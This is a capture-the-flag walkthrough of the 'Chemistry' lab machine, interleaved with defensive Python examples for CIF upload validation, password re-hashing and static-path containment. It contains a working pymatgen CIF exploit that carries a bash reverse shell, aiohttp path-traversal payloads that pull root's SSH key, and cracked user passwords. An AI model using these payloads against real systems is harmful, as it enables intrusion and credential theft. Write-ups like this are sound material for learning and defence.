Chemistry
Last updated
Chemistry is an easy Linux machine created by . The application uses pymatgen to analyse uploaded CIF files and is vulnerable to CVE-2024-23346, which gives us a shell as the app user. The database.db file contains usernames and password hashes; cracking them gives us a shell as rosa. The website on port 8080 runs an aiohttp server vulnerable to the CVE-2024-23334 LFI; root's id_rsa file is fetched through it and a root shell is gained.
Linux
Easy
20
19-10-2024
08-03-2025
Starting with an nmap scan, we find SSH and HTTP services running.
nmap -Pn -sC -sV --min-rate=1000 10.10.11.38
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-28 11:13 GMT
Nmap scan report for 10.10.11.38
Host is up (0.65s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open http Werkzeug httpd 3.0.3 (Python 3.9.5)
|_http-title: Chemistry - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.43 seconds
The website offers a service that analyses CIF (Crystallographic Information File) uploads.
Registering gives us access to the dashboard, which has an input field for uploading a CIF file.
It also provides an example .cif file. Downloading it and uploading it back gives the result below.
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c 'sh -i >& /dev/tcp/10.10.16.19/8443 0>&1'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
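For reference, here is what makes the CIF above dangerous and how an upload handler can refuse it. Vulnerable pymatgen releases (the advisory lists versions before 2024.2.20) built the symmetry transformation from the _space_group_magn.transform_BNS_Pp_abc string with eval(), so any expression placed where the a,b,c vector belongs runs as the service user. The Python below is an added example, not code from the Chemistry app or from pymatgen: it pulls that data item out of an uploaded file and accepts only strings that fit the Jones-faithful grammar (three linear terms in a, b, c, optionally followed by an origin shift), so a file like the one above never reaches the parser. The two CIF texts, the key list and the regex are constructed here; SUSPECT_CIF carries a stand-in expression rather than a working payload. Updating pymatgen and parsing uploads in an unprivileged worker remain the primary fixes; this check is a cheap gate in front of them.

```python
import re

# Constructed sample inputs. BENIGN_CIF is the example file from the page;
# SUSPECT_CIF has the same shape as the page's exploit file but carries a
# constructed stand-in expression where the a,b,c vector should be.
BENIGN_CIF = """data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
"""

SUSPECT_CIF = """data_sample
_audit_creation_date 2018-06-08
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[x for x in ().__class__.__mro__];0,0,0'
_space_group_magn.number_BNS 62.448
"""

# Data items whose value vulnerable pymatgen versions passed to eval().
# Only the key shown on this page is listed; extend the tuple as needed.
TRANSFORM_KEYS = ("_space_group_magn.transform_BNS_Pp_abc",)

# Grammar of a legitimate Jones-faithful transformation, e.g. "a,b,c;0,0,0"
# or "a-b,a+b,2c;1/2,0,0": three linear terms in a,b,c, optionally followed
# by ";" and three numeric origin-shift components. Nothing else is allowed.
_TERM = r"[+\-]?(?:(?:\d+(?:/\d+)?|\d+\.\d+)\*?[abc]?|[abc])"
_LINEAR = rf"(?:{_TERM})+"
_NUMBER = r"[+\-]?(?:\d+(?:/\d+)?|\d+\.\d+)"
TRANSFORM_RE = re.compile(
    rf"^\s*{_LINEAR}\s*,\s*{_LINEAR}\s*,\s*{_LINEAR}\s*"
    rf"(?:;\s*{_NUMBER}\s*,\s*{_NUMBER}\s*,\s*{_NUMBER}\s*)?$"
)


def _unquote(value: str) -> str:
    """Strip one layer of CIF quoting ('...' or "...") if present."""
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        return value[1:-1]
    return value


def extract_transform_strings(cif_text: str) -> list:
    """Return (key, value) pairs for every transformation item in the file."""
    found = []
    for line in cif_text.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) == 2 and parts[0] in TRANSFORM_KEYS:
            found.append((parts[0], _unquote(parts[1])))
    return found


def is_safe_transform(value: str) -> bool:
    """True only if the string fits the transformation grammar exactly."""
    return TRANSFORM_RE.fullmatch(value) is not None


def audit_cif(cif_text: str) -> list:
    """Return the (key, value) pairs that must not reach the parser.
    An empty list means the file passed this check."""
    return [(k, v) for k, v in extract_transform_strings(cif_text)
            if not is_safe_transform(v)]


if __name__ == "__main__":
    print("benign :", audit_cif(BENIGN_CIF))
    print("suspect:", audit_cif(SUSPECT_CIF))
```

Run audit_cif() on every upload before it is handed to the parser and reject the file when the list is non-empty; the offending key/value pair is also what you want in the application log, since it is a clear indicator of an exploitation attempt against this CVE.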
The instance directory inside the app user's home directory contains database.db.
$ ls
app.py
instance
static
templates
uploads
$ cd instance
$ ls
database.db
Transferring the file to our system for enumeration using Python's http.server on the target and wget locally.
$ which python3
/usr/bin/python3
$ python3 -m http.server
wget http://10.10.11.38:8000/database.db
--2025-03-01 05:17:48-- http://10.10.11.38:8000/database.db
Connecting to 10.10.11.38:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/octet-stream]
Saving to: ‘database.db’
database.db 100%[========================================================================================>] 20.00K 16.2KB/s in 1.2s
2025-03-01 05:17:51 (16.2 KB/s) - ‘database.db’ saved [20480/20480]
database.db is a SQLite 3 database, so we open it with sqlitebrowser.
file database.db
database.db: SQLite 3.x database, last written using SQLite version 3031001, file counter 130, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 130
sqlitebrowser database.db
The database contains two tables, structure and user. The user table lists the users and their hashed passwords. After exporting it from sqlitebrowser as user.csv, the header row is dropped and the username:hash pairs are extracted with awk.
awk 'NR > 1' user.csv > user.txt
awk -F ',' '{ print $2":"$3 }' user.txt > hash
admin:2861debaf8d99436a10ed6f75a252abf
app:197865e46b878d9e74a0346b6d59886a
rosa:63ed86ee9f624c7b14f1d4f43dc251a5
robert:02fcf7cfc10adc37959fb21f06c6b467
jobert:3dec299e06f7ed187bac06bd3b670ab2
carlos:9ad48828b0955513f7cf0f7f6510c8f8
peter:6845c17d298d95aa942127bdad2ceb9b
victoria:c3601ad2286a4293868ec2a4bc606ba3
tania:a4aa55e816205dc0389591c9f82f43bb
eusebio:6cad48078d0241cca9a7b322ecd073b3
gelacia:4af70c80b68267012ecdac9a7e916d18
fabian:4e5d71f53fdd2eabdbabb233113b5dc0
axel:9347f9724ca083b17e39555c36fd9007
kristel:6896ba7b11a62cacffbdaded457c6d92
test:cc03e747a6afbbcbf8be7668acfebee5
dexter:a125a6b2a71e23adc002ac7fbe1a1042
hi:49f68a5c8493ec2c0bf489821c21fc3b
lobotech:4599df31c8496e34dbe34c6615fc5991
lalala:9aa6e5f2256c17d2d430b100032b997c
The hashes are 32 hex characters, so we run hashcat in raw MD5 mode (-m 0) with the rockyou wordlist and --user so it reads the username:hash format.
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt --user
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 19 digests; 19 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
----- SNIP -----
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
a125a6b2a71e23adc002ac7fbe1a1042:dexter
9aa6e5f2256c17d2d430b100032b997c:lalala
9ad48828b0955513f7cf0f7f6510c8f8:carlos123
cc03e747a6afbbcbf8be7668acfebee5:test123
49f68a5c8493ec2c0bf489821c21fc3b:hi
6845c17d298d95aa942127bdad2ceb9b:peterparker
c3601ad2286a4293868ec2a4bc606ba3:victoria123
63ed86ee9f624c7b14f1d4f43dc251a5:unicorniosrosados
Approaching final keyspace - workload adjusted.
----- SNIP -----
Started: Sat Mar 1 05:50:01 2025
Stopped: Sat Mar 1 05:50:34 2025
Using the password unicorniosrosados we can SSH in as rosa.
ssh rosa@10.10.11.38
rosa@10.10.11.38's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat 01 Mar 2025 12:31:07 PM UTC
System load: 0.0
Usage of /: 84.6% of 5.08GB
Memory usage: 35%
Swap usage: 0%
Processes: 260
Users logged in: 0
IPv4 address for eth0: 10.10.11.38
IPv6 address for eth0: dead:beef::250:56ff:feb9:7dee
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
9 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Mar 1 10:56:27 2025 from 10.10.14.84
rosa@chemistry:~$
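The hashes cracked above are unsalted MD5, which is why hashcat recovered eight of the nineteen from rockyou in about thirty seconds on a laptop CPU. As an added example (not the app's code; the user table and the scrypt parameters are constructed, with two digests taken from the hash list on this page), the Python below shows what the app should store instead and how to migrate an existing table without resetting every password: a legacy row is re-hashed with salted scrypt the next time its user logs in successfully, all comparisons are constant-time, and an audit function lists the rows that still hold the old digest.

```python
import hashlib
import hmac
import os
import re
from typing import Dict, Optional

# Constructed sample of the app's user table: unsalted MD5 digests, two of
# which are taken from the hash list on this page.
USERS: Dict[str, str] = {
    "hi": "49f68a5c8493ec2c0bf489821c21fc3b",    # md5("hi")
    "test": "cc03e747a6afbbcbf8be7668acfebee5",  # md5("test123")
}

_MD5_HEX = re.compile(r"^[0-9a-f]{32}$")
# scrypt cost parameters (constructed; 2**14 x 8 x 1 uses ~16 MiB per hash)
_SCRYPT_N, _SCRYPT_R, _SCRYPT_P, _DKLEN = 2 ** 14, 8, 1, 32


def legacy_md5(password: str) -> str:
    """The scheme the database used: one unsalted MD5 per password."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, memory-hard scrypt hash in a self-describing string."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=_SCRYPT_N, r=_SCRYPT_R, p=_SCRYPT_P, dklen=_DKLEN)
    return "$".join(["scrypt", str(_SCRYPT_N), str(_SCRYPT_R), str(_SCRYPT_P),
                     salt.hex(), digest.hex()])


def is_legacy_hash(stored: str) -> bool:
    """True for a bare 32-hex-digit value, i.e. an unsalted MD5 row."""
    return _MD5_HEX.match(stored) is not None


def verify_password(stored: str, password: str) -> bool:
    """Check a password against either scheme using constant-time compares."""
    if stored.startswith("scrypt$"):
        _, n, r, p, salt_hex, digest_hex = stored.split("$")
        calc = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                              n=int(n), r=int(r), p=int(p),
                              dklen=len(digest_hex) // 2)
        return hmac.compare_digest(calc.hex(), digest_hex)
    if is_legacy_hash(stored):
        return hmac.compare_digest(legacy_md5(password), stored)
    return False


def audit_user_table(users: Dict[str, str]) -> list:
    """Usernames whose stored credential is still an unsalted MD5 digest."""
    return sorted(u for u, h in users.items() if is_legacy_hash(h))


def login(users: Dict[str, str], username: str, password: str) -> bool:
    """Authenticate, and transparently re-hash legacy rows on success."""
    stored = users.get(username)
    if stored is None:
        hash_password(password)  # spend the same time for unknown users
        return False
    if not verify_password(stored, password):
        return False
    if is_legacy_hash(stored):
        users[username] = hash_password(password)  # migrate this row
    return True


if __name__ == "__main__":
    print("legacy rows before:", audit_user_table(USERS))
    print("login hi/hi       :", login(USERS, "hi", "hi"))
    print("legacy rows after :", audit_user_table(USERS))
```

Until every row has been migrated, the remaining MD5 digests are still crackable if the database leaks again, so audit_user_table() output is the list of accounts to force a password change for after a grace period.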
Running netstat reveals several listening ports, including 8080 bound to localhost only.
rosa@chemistry:~$ netstat -tlnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9001 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Using curl against port 8080, the Server header shows aiohttp/3.9.1.
rosa@chemistry:~$ curl -I http://localhost:8080
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5971
Date: Sat, 01 Mar 2025 12:45:21 GMT
Server: Python/3.9 aiohttp/3.9.1
Clone the repository on the local machine, because it cannot be cloned directly from rosa's shell.
git clone https://github.com/wizarddos/CVE-2024-23334.git
Cloning into 'CVE-2024-23334'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 12 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (12/12), 5.08 KiB | 1.27 MiB/s, done.
Resolving deltas: 100% (1/1), done.
Serve it with Python's http.server locally and download it on the target with wget.
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
rosa@chemistry:~$ wget http://10.10.16.19:8000/CVE-2024-23334/exploit.py
--2025-03-01 14:24:33-- http://10.10.16.19:8000/CVE-2024-23334/exploit.py
Connecting to 10.10.16.19:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1522 (1.5K) [text/x-python]
Saving to: ‘exploit.py’
exploit.py 100%[========================================================================================>] 1.49K 2.80KB/s in 0.5s
2025-03-01 14:24:36 (2.80 KB/s) - ‘exploit.py’ saved [1522/1522]
Running the script against the static route to fetch /root/.ssh/id_rsa.
rosa@chemistry:~$ python3 exploit.py -u http://localhost:8080/assets -f /root/.ssh/id_rsa
[+] Attempt 0
Payload: /static/../root/.ssh/id_rsa
Status code: 404
[+] Attempt 1
Payload: /static/../../root/.ssh/id_rsa
Status code: 404
[+] Attempt 2
Payload: /static/../../../root/.ssh/id_rsa
Status code: 404
[+] Attempt 3
Payload: /static/../../../../root/.ssh/id_rsa
Status code: 200
Respose:
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
Exploit complete
rosa@chemistry:~$
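The fourth attempt succeeds because aiohttp 3.9.1's static route, when registered with follow_symlinks=True, skipped the check that the resolved file still lies under the static directory; 3.9.2 restored that check. The Python below is an added example, not aiohttp's code or the exploit's: it implements the containment check (resolving symlinks before comparing against the root) and a simpler request-level detector for '..' segments, and runs both over the four payloads from the output above plus constructed benign and symlink cases. The temporary directory layout, the file names and the REQUESTS list are constructed.

```python
import os
import tempfile
from pathlib import Path, PurePosixPath
from typing import Dict, Optional
from urllib.parse import unquote

STATIC_PREFIX = "/static"

# Requests from the page's exploit run (the fourth one returned the key),
# plus constructed benign, percent-encoded and symlink cases.
REQUESTS = [
    "/static/app.css",
    "/static/../root/.ssh/id_rsa",
    "/static/../../root/.ssh/id_rsa",
    "/static/../../../root/.ssh/id_rsa",
    "/static/../../../../root/.ssh/id_rsa",
    "/static/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa",
    "/static/escape/secret.txt",
]


def looks_like_traversal(url_path: str) -> bool:
    """Cheap request-level detector: any '..' segment after percent-decoding.
    Two decode rounds catch double-encoded dots. Suitable for access logs."""
    decoded = unquote(unquote(url_path))
    return ".." in PurePosixPath(decoded).parts


def resolve_static(root: Path, url_path: str,
                   prefix: str = STATIC_PREFIX) -> Optional[Path]:
    """Map a URL to a file under root, or None if it would leave root.
    Symlinks are resolved before the comparison, so a link that points
    outside the static directory is refused as well."""
    if not url_path.startswith(prefix + "/"):
        return None
    rel = unquote(url_path[len(prefix) + 1:])
    real_root = root.resolve()
    candidate = (real_root / rel).resolve()
    try:
        candidate.relative_to(real_root)  # raises if outside real_root
    except ValueError:
        return None
    return candidate if candidate.is_file() else None


def build_demo_tree() -> Path:
    """Constructed layout: <tmp>/static/app.css inside the static root,
    <tmp>/secret.txt outside it, and a symlink <tmp>/static/escape -> <tmp>."""
    base = Path(tempfile.mkdtemp(prefix="aiohttp-demo-"))
    static = base / "static"
    static.mkdir()
    (static / "app.css").write_text("body{}")
    (base / "secret.txt").write_text("not for the web")
    try:
        os.symlink(base, static / "escape", target_is_directory=True)
    except OSError:
        pass  # platforms without symlink support: the case is simply absent
    return static


def check_all(root: Optional[Path] = None) -> Dict[str, bool]:
    """True where the request would be served, False where it is refused."""
    root = root if root is not None else build_demo_tree()
    return {req: resolve_static(root, req) is not None for req in REQUESTS}


if __name__ == "__main__":
    for req, served in check_all().items():
        print(f"{'SERVED ' if served else 'REFUSED'} {req}  "
              f"(traversal pattern: {looks_like_traversal(req)})")
```

Note that the last request has no '..' in it at all, so looks_like_traversal() misses it while resolve_static() still refuses it: the request-level pattern is useful for hunting through logs, but the filesystem check is the one to rely on, and on this box the real fix is upgrading aiohttp past 3.9.1 and not enabling follow_symlinks on the static route.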
Copy and paste the id_rsa into a file on the local machine, remove any extra whitespace from the private key (otherwise ssh fails with a libcrypto error), and restrict its permissions.
chmod 600 id_rsa
ssh -i id_rsa root@10.10.11.38
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat 01 Mar 2025 02:52:03 PM UTC
System load: 0.0
Usage of /: 72.8% of 5.08GB
Memory usage: 22%
Swap usage: 0%
Processes: 234
Users logged in: 1
IPv4 address for eth0: 10.10.11.38
IPv6 address for eth0: dead:beef::250:56ff:feb9:3907
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
9 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Oct 11 14:06:59 2024
root@chemistry:~#
The video below provides the PoC for the Chemistry machine.
Searching for vulnerabilities in CIF processing leads us to CVE-2024-23346, an arbitrary code execution vulnerability. The PoC is released on GitHub: the CIF file is analysed using pymatgen, and the parser is abused for arbitrary code execution.
The user.txt file contains the user flag
aiohttp 3.9.1 is vulnerable to the CVE-2024-23334 LFI, and wizarddos has published a GitHub repository containing the PoC and a script that exploits the vulnerability.
The root.txt file contains the root flag